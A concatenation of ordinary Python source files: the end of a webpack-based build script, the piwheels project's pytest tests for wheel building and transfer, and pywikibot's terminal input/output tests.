OUTPUT_DIRS_FOR_WEBPACK = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
SOURCE_DIRS_FOR_WEBPACK, OUTPUT_DIRS_FOR_WEBPACK)
SOURCE_DIRS_FOR_EXTENSIONS = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
OUTPUT_DIRS_FOR_EXTENSIONS = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(SOURCE_DIRS_FOR_EXTENSIONS, OUTPUT_DIRS_FOR_EXTENSIONS)
SOURCE_DIRS_FOR_TEMPLATES = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
OUTPUT_DIRS_FOR_TEMPLATES = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(SOURCE_DIRS_FOR_TEMPLATES, OUTPUT_DIRS_FOR_TEMPLATES)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only and not options.prod_mode:
raise Exception(
'minify_third_party_libs_only should not be set in non-prod mode.')
if options.prod_mode:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
if not options.minify_third_party_libs_only:
hashes = generate_hashes()
build_using_webpack()
generate_app_yaml(is_prod_mode=options.prod_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
test_builder.py | # The piwheels project
# Copyright (c) 2017 Ben Nuttall <https://github.com/bennuttall>
# Copyright (c) 2017 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import os
import io
import zipfile
from hashlib import sha256
from unittest import mock
from pathlib import Path
from threading import Thread, Event
from datetime import datetime, timedelta
import pytest
from piwheels import transport, proc
from piwheels.slave import builder
@pytest.fixture()
def bad_archive(request):
archive = io.BytesIO()
with zipfile.ZipFile(archive, 'w', compression=zipfile.ZIP_STORED) as arc:
arc.writestr('foo/__init__.py', b'\x00' * 123456)
arc.writestr('foo/foo.cpython-34m-linux_armv7l-linux-gnu.so',
b'\x7FELF' + b'\xFF' * 123456)
arc.writestr('foo/im.not.really.a.library.so.there',
b'blah' * 4096)
return archive.getvalue()
@pytest.fixture()
def mock_archive(request, bad_archive):
source = io.BytesIO(bad_archive)
archive = io.BytesIO()
with zipfile.ZipFile(source, 'r') as src:
with zipfile.ZipFile(archive, 'w', compression=zipfile.ZIP_STORED) as dest:
for info in src.infolist():
dest.writestr(info, src.read(info))
dest.writestr('foo-0.1.dist-info/METADATA', """\
Metadata-Version: 2.0
Name: foo
Version: 0.1
Summary: A test package
Home-page: http://foo.com/
Author: Some foo
Author-email: foo@foo.com
License: BSD
Platform: any
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python
""")
return archive.getvalue()
@pytest.fixture()
def bad_package(request, bad_archive):
with mock.patch('piwheels.slave.builder.Path.stat') as stat_mock, \
mock.patch('piwheels.slave.builder.Path.open') as open_mock:
stat_mock.return_value = os.stat_result(
(0o644, 1, 1, 1, 1000, 1000, len(bad_archive), 0, 0, 0))
open_mock.side_effect = lambda mode: io.BytesIO(bad_archive)
h = sha256()
h.update(bad_archive)
yield len(bad_archive), h.hexdigest().lower()
@pytest.fixture()
def mock_package(request, mock_archive):
with mock.patch('piwheels.slave.builder.Path.stat') as stat_mock, \
mock.patch('piwheels.slave.builder.Path.open') as open_mock:
stat_mock.return_value = os.stat_result(
(0o644, 1, 1, 1, 1000, 1000, len(mock_archive), 0, 0, 0))
open_mock.side_effect = lambda mode: io.BytesIO(mock_archive)
h = sha256()
h.update(mock_archive)
yield len(mock_archive), h.hexdigest().lower()
@pytest.fixture()
def transfer_thread(request, zmq_context, mock_systemd, mock_package):
with zmq_context.socket(transport.DEALER) as server_sock, \
zmq_context.socket(transport.DEALER) as client_sock:
server_sock.bind('inproc://test-transfer')
client_sock.connect('inproc://test-transfer')
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
client_thread = Thread(target=pkg.transfer, args=(client_sock, 1))
client_thread.start()
yield server_sock
client_thread.join(10)
assert not client_thread.is_alive()
def test_package_init(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.filename == 'foo-0.1-cp34-cp34m-linux_armv7l.whl'
assert pkg.filesize == filesize
assert pkg.filehash == filehash
assert pkg.package_tag == 'foo'
assert pkg.package_version_tag == '0.1'
assert pkg.platform_tag == 'linux_armv7l'
assert pkg.abi_tag == 'cp34m'
assert pkg.py_version_tag == 'cp34'
assert pkg.build_tag is None
def test_package_noabi(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-noabi-any.whl')
pkg = builder.Wheel(path)
assert pkg.filename == 'foo-0.1-cp34-noabi-any.whl'
assert pkg.filesize == filesize
assert pkg.filehash == filehash
assert pkg.package_tag == 'foo'
assert pkg.package_version_tag == '0.1'
assert pkg.platform_tag == 'any'
assert pkg.abi_tag == 'none'
assert pkg.py_version_tag == 'cp34'
assert pkg.build_tag is None
def test_package_hash_cache(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-noabi-any.whl')
pkg = builder.Wheel(path)
assert pkg.filehash == filehash
# Second retrieval is cached
assert pkg.filehash == filehash
def test_package_open(mock_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
with pkg.open() as f:
with zipfile.ZipFile(f) as arc:
assert len(arc.namelist()) == 4
assert 'foo-0.1.dist-info/METADATA' in arc.namelist()
assert 'foo/foo.cpython-34m-linux_armv7l-linux-gnu.so' in arc.namelist()
assert 'foo/__init__.py' in arc.namelist()
def test_package_metadata(mock_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.metadata['Metadata-Version'] == '2.0'
assert pkg.metadata['Name'] == 'foo'
assert pkg.metadata['Version'] == '0.1'
def test_package_metadata_canon(mock_package):
path = Path('/tmp/abc123/Foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.metadata['Metadata-Version'] == '2.0'
assert pkg.metadata['Name'] == 'foo'
assert pkg.metadata['Version'] == '0.1'
def test_package_bad_metadata(bad_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
with pytest.raises(builder.BadWheel):
builder.Wheel(path)
def test_package_transfer(mock_archive, mock_package, transfer_thread):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert transfer_thread.recv_multipart() == [b'HELLO', b'1']
transfer_thread.send_multipart([b'FETCH', b'0', str(filesize).encode('ascii')])
assert transfer_thread.recv_multipart() == [b'CHUNK', b'0', mock_archive]
transfer_thread.send_multipart([b'DONE'])
def test_package_transfer_nonsense(mock_archive, mock_package, transfer_thread):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert transfer_thread.recv_multipart() == [b'HELLO', b'1']
transfer_thread.send_multipart([b'FOO', b'BAR'])
# Continue with the transfer normally; the anomalous message should be
# ignored and the protocol should continue
transfer_thread.send_multipart([b'FETCH', b'0', b'4096'])
transfer_thread.send_multipart([b'FETCH', b'4096', str(filesize - 4096).encode('ascii')])
chunk1 = transfer_thread.recv_multipart()
chunk2 = transfer_thread.recv_multipart()
assert chunk1 == [b'CHUNK', b'0', mock_archive[:4096]]
assert chunk2 == [b'CHUNK', b'4096', mock_archive[4096:]]
transfer_thread.send_multipart([b'DONE'])
def test_builder_init(tmpdir):
b = builder.Builder('foo', '0.1', dir=str(tmpdir))
assert b.package == 'foo'
assert b.version == '0.1'
assert b.duration is None
assert b.output == ''
assert b.wheels == []
assert b.status is False
assert b.timeout == timedelta(minutes=5)
def test_builder_as_message():
b = builder.Builder('foo', '0.1')
assert b.as_message() == ['foo', '0.1', False, None, '', []]
def test_builder_build_success(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Builder.build_dependencies') as dep_mock:
tmpdir_mock().name = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
args, kwargs = proc_mock.call.call_args
assert args[0][-1] == 'foo==0.1'
assert len(b.wheels) == 1
assert b.wheels[0].filename == 'foo-0.1-cp34-cp34m-linux_armv7l.whl'
def test_builder_build_timeout(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.datetime') as time_mock:
tmpdir_mock().name = str(tmpdir)
proc_mock.call.side_effect = proc.TimeoutExpired(['pip3'], 300)
now = datetime.utcnow()
time_mock.utcnow.side_effect = [
now, now + timedelta(seconds=100), now + timedelta(seconds=1000),
now + timedelta(seconds=1001)]
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
args, kwargs = proc_mock.call.call_args
assert args[0][-1] == 'foo==0.1'
assert len(b.wheels) == 0
def test_builder_build_stop(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.datetime') as time_mock:
tmpdir_mock().name = str(tmpdir)
def call(*args, **kwargs):
assert b._stopped.wait(2)
raise proc.ProcessTerminated('pip3', b._stopped)
proc_mock.call.side_effect = call
time_mock.utcnow.return_value = datetime.utcnow()
b = builder.Builder('foo', '0.1')
b.start()
b.stop()
b.join(1)
assert not b.is_alive()
assert not b.status
assert b.output.endswith("Command 'pip3' was terminated early by event")
assert len(b.wheels) == 0
def test_builder_build_close(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock:
tmpdir_mock().name = str(tmpdir)
proc_mock.call.return_value = 0
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
b.close()
assert tmpdir_mock().cleanup.call_args == mock.call()
def test_builder_build_dependencies(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Path.resolve', lambda self: self), \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
proc_mock.check_output.return_value = b"""\
linux-vdso.so.1 => (0x00007ffd48669000)
libblas.so.3 => /usr/lib/libblas.so.3 (0x00007f711a958000)
libm.so.6 => /lib/arm-linux-gnueabihf/libm.so.6 (0x00007f711a64f000)
libpthread.so.0 => /lib/arm-linux-gnueabihf/libpthread.so.0 (0x00007f711a432000)
libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x00007f711a068000)
/lib64/ld-linux-x86-64.so.2 (0x00007f711af48000)
libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)
libgfortran.so.3 => /usr/lib/arm-linux-gnueabihf/libgfortran.so.3 (0x00007f7117ca9000)
libquadmath.so.0 => /usr/lib/arm-linux-gnueabihf/libquadmath.so.0 (0x00007f7117a6a000)
libgcc_s.so.1 => /lib/arm-linux-gnueabihf/libgcc_s.so.1 (0x00007f7117854000)
"""
def pkg(name, files):
m = mock.Mock()
m.name = name
m.installed = True
m.installed_files = files
return m
apt_mock.cache.Cache.return_value = [
pkg('libc6', [
'/lib/arm-linux-gnueabihf/libc.so.6',
'/lib/arm-linux-gnueabihf/libm.so.6',
'/lib/arm-linux-gnueabihf/libpthread.so.0',
]),
pkg('libopenblas-base', [
'/usr/lib/libblas.so.3',
'/usr/lib/libopenblas.so.0',
]),
pkg('libgcc1', ['/lib/arm-linux-gnueabihf/libgcc_s.so.1']),
pkg('libgfortran3', ['/usr/lib/arm-linux-gnueabihf/libgfortran.so.3']),
]
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
assert b.wheels[0].dependencies == {
'apt': ['libc6', 'libgcc1', 'libgfortran3', 'libopenblas-base'],
'': ['/usr/lib/arm-linux-gnueabihf/libquadmath.so.0'],
}
def test_builder_dependencies_missing(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Path.resolve', side_effect=FileNotFoundError()), \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
proc_mock.check_output.return_value = (
b"libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)")
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
assert b.wheels[0].dependencies == {}
def test_builder_dependencies_failed(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock, \
mock.patch('piwheels.slave.builder.proc.check_output') as output_mock, \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
call_mock.side_effect = call
output_mock.side_effect = proc.TimeoutExpired('ldd', 30)
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert not b.wheels
def test_builder_dependencies_stopped(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock, \
mock.patch('piwheels.slave.builder.proc.check_output') as output_mock, \
mock.patch('piwheels.slave.builder.apt') as apt_mock, \
mock.patch('piwheels.slave.builder.Path.resolve') as resolve_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
def stop(*args, **kwargs):
b.stop()
return b"libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)"
call_mock.side_effect = call
output_mock.side_effect = stop
resolve_mock.return_value = '/usr/lib/libopenblas.so.0'
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert re.search(r'Command .* was terminated early by event$', b.output)
def test_builder_bad_metadata(bad_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(bad_archive)
return 0
call_mock.side_effect = call
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert not b.wheels
assert re.search(r'Unable to locate METADATA in', b.output)
|
ui_tests.py | # -*- coding: utf-8 -*-
"""
Tests for the page module.
"""
#
# (C) Pywikipedia bot team, 2008
#
# Distributed under the terms of the MIT license.
#
__version__ = '$Id: dba6bc16d605e3529dedc9c8e946a74e2c9ee99c $'
import unittest
import cStringIO
import StringIO
import logging
import os
import sys
if os.name == "nt":
from multiprocessing.managers import BaseManager
import threading
import win32clipboard
class pywikibotWrapper(object):
def init(self):
import pywikibot
def output(self, *args, **kwargs):
import pywikibot
return pywikibot.output(*args, **kwargs)
def request_input(self, *args, **kwargs):
import pywikibot
self.input = None
def threadedinput():
self.input = pywikibot.input(*args, **kwargs)
self.inputthread = threading.Thread(target=threadedinput)
self.inputthread.start()
def get_input(self):
self.inputthread.join()
return self.input
def set_config(self, key, value):
import pywikibot
setattr(pywikibot.config, key, value)
def set_ui(self, key, value):
import pywikibot
setattr(pywikibot.ui, key, value)
def cls(self):
os.system('cls')
class pywikibotManager(BaseManager):
pass
pywikibotManager.register('pywikibot', pywikibotWrapper)
_manager = pywikibotManager(address=("127.0.0.1", 47228), authkey="4DJSchgwy5L5JxueZEWbxyeG")
if len(sys.argv) > 1 and sys.argv[1] == "--run-as-slave-interpreter":
s = _manager.get_server()
s.serve_forever()
if __name__ == "__main__":
oldstderr = sys.stderr
oldstdout = sys.stdout
oldstdin = sys.stdin
newstdout = cStringIO.StringIO()
newstderr = cStringIO.StringIO()
newstdin = StringIO.StringIO()
def patch():
sys.stdout = newstdout
sys.stderr = newstderr
sys.stdin = newstdin
def unpatch():
sys.stdout = oldstdout
sys.stderr = oldstderr
sys.stdin = oldstdin
try:
patch()
import pywikibot
finally:
unpatch()
from pywikibot.bot import DEBUG, VERBOSE, INFO, STDOUT, INPUT, WARNING, ERROR, CRITICAL
logger = logging.getLogger('pywiki')
loggingcontext = {'caller_name': "ui_tests",
'caller_file': "ui_tests",
'caller_line': 0,
'newline': "\n"}
class UITestCase(unittest.TestCase):
def setUp(self):
patch()
newstdout.truncate(0)
newstderr.truncate(0)
newstdin.truncate(0)
pywikibot.config.colorized_output = True
pywikibot.config.transliterate = False
pywikibot.ui.transliteration_target = None
pywikibot.ui.encoding = 'utf-8'
def tearDown(self):
unpatch()
class TestTerminalOutput(UITestCase):
def testOutputLevels_logging_debug(self):
logger.log(DEBUG, 'debug', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_verbose(self):
logger.log(VERBOSE, 'verbose', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_info(self):
logger.log(INFO, 'info', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "info\n")
def testOutputLevels_logging_stdout(self):
logger.log(STDOUT, 'stdout', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "stdout\n")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_input(self):
logger.log(INPUT, 'input', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "input\n")
def testOutputLevels_logging_WARNING(self):
logger.log(WARNING, 'WARNING', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "WARNING: WARNING\n")
def testOutputLevels_logging_ERROR(self):
logger.log(ERROR, 'ERROR', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: ERROR\n")
def testOutputLevels_logging_CRITICAL(self):
logger.log(CRITICAL, 'CRITICAL', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "CRITICAL: CRITICAL\n")
def test_output(self):
pywikibot.output("output", toStdout=False)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "output\n")
def test_output(self):
pywikibot.output("output", toStdout=True)
self.assertEqual(newstdout.getvalue(), "output\n")
self.assertEqual(newstderr.getvalue(), "")
def test_warning(self):
pywikibot.warning("warning")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "WARNING: warning\n")
def test_error(self):
pywikibot.error("error")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: error\n")
def test_log(self):
pywikibot.log("log")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def test_critical(self):
pywikibot.critical("critical")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "CRITICAL: critical\n")
def test_debug(self):
pywikibot.debug("debug", "test")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def test_exception(self):
class TestException(Exception):
pass
try:
raise TestException("Testing Exception")
except TestException:
pywikibot.exception("exception")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: TestException: Testing Exception\n")
def test_exception(self):
class TestException(Exception):
pass
try:
raise TestException("Testing Exception")
except TestException:
pywikibot.exception("exception", tb=True)
self.assertEqual(newstdout.getvalue(), "")
stderrlines = newstderr.getvalue().split("\n")
self.assertEqual(stderrlines[0], "ERROR: TestException: Testing Exception")
self.assertEqual(stderrlines[1], "Traceback (most recent call last):")
self.assertEqual(stderrlines[3], """ raise TestException("Testing Exception")""")
self.assertEqual(stderrlines[4], "TestException: Testing Exception")
self.assertNotEqual(stderrlines[-1], "\n")
class TestTerminalInput(UITestCase):
def testInput(self):
newstdin.write("input to read\n")
newstdin.seek(0)
returned = pywikibot.input("question")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, u"input to read")
@unittest.expectedFailure
def testInputChoiceDefault(self):
newstdin.write("\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "a")
def testInputChoiceCapital(self):
newstdin.write("N\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
def testInputChoiceNonCapital(self):
newstdin.write("n\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
def testInputChoiceIncorrectAnswer(self):
newstdin.write("X\nN\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) "*2)
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTerminalOutputColorUnix(UITestCase):
def testOutputColorizedText(self):
pywikibot.output(u"normal text \03{lightpurple}light purple text\03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1mlight purple text\x1b[0m normal text\n\x1b[0m")
def testOutputNoncolorizedText(self):
pywikibot.config.colorized_output = False
pywikibot.output(u"normal text \03{lightpurple}light purple text\03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text light purple text normal text ***\n")
@unittest.expectedFailure
def testOutputColorCascade(self):
pywikibot.output(u"normal text \03{lightpurple} light purple \03{lightblue} light blue \03{default} light purple \03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1m light purple \x1b[94;1m light blue \x1b[35;1m light purple \x1b[0m normal text\n\x1b[0m")
def testOutputColorCascade_incorrect(self):
''' This test documents current (incorrect) behavior '''
pywikibot.output(u"normal text \03{lightpurple} light purple \03{lightblue} light blue \03{default} light purple \03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1m light purple \x1b[94;1m light blue \x1b[0m light purple \x1b[0m normal text\n\x1b[0m")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTerminalUnicodeUnix(UITestCase):
def testOutputUnicodeText(self):
pywikibot.output(u"Заглавная_страница")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), u"Заглавная_страница\n".encode('utf-8'))
def testInputUnicodeText(self):
newstdin.write(u"Заглавная_страница\n".encode('utf-8'))
newstdin.seek(0)
returned = pywikibot.input(u"Википедию? ")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), u"Википедию? ".encode('utf-8'))
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, u"Заглавная_страница")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTransliterationUnix(UITestCase):
def testOutputTransliteratedUnicodeText(self):
pywikibot.ui.encoding = 'latin-1'
pywikibot.config.transliterate = True
pywikibot.output(u"abcd АБГД αβγδ あいうえお")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "abcd \x1b[33;1mA\x1b[0m\x1b[33;1mB\x1b[0m\x1b[33;1mG\x1b[0m\x1b[33;1mD\x1b[0m \x1b[33;1ma\x1b[0m\x1b[33;1mb\x1b[0m\x1b[33;1mg\x1b[0m\x1b[33;1md\x1b[0m \x1b[33;1ma\x1b[0m\x1b[33;1mi\x1b[0m\x1b[33;1mu\x1b[0m\x1b[33;1me\x1b[0m\x1b[33;1mo\x1b[0m\n\x1b[0m") # noqa
@unittest.skipUnless(os.name == "nt", "requires Windows console")
class TestWindowsTerminalUnicode(UITestCase):
@classmethod
def setUpClass(cls):
import inspect
import pywinauto
import subprocess
si = subprocess.STARTUPINFO()
si.dwFlags = subprocess.STARTF_USESTDHANDLES
fn = inspect.getfile(inspect.currentframe())
cls._process = subprocess.Popen(["python", "pwb.py", fn, "--run-as-slave-interpreter"],
creationflags=subprocess.CREATE_NEW_CONSOLE)
_manager.connect()
cls.pywikibot = _manager.pywikibot()
cls._app = pywinauto.application.Application()
cls._app.connect_(process=cls._process.pid)
# set truetype font (Lucida Console, hopefully)
cls._app.window_().TypeKeys("% {UP}{ENTER}^L{HOME}L{ENTER}", with_spaces=True)
@classmethod
def tearDownClass(cls):
del cls.pywikibot
cls._process.kill()
def getstdouterr(self):
# select all and copy to clipboard
self._app.window_().SetFocus()
self._app.window_().TypeKeys('% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{DOWN}{ENTER}{ENTER}', with_spaces=True)
return self.getclip()
def setclip(self, text):
win32clipboard.OpenClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_UNICODETEXT, unicode(text))
win32clipboard.CloseClipboard()
def getclip(self):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT)
win32clipboard.CloseClipboard()
data = data.split(u"\x00")[0]
data = data.replace(u"\r\n", u"\n")
return data
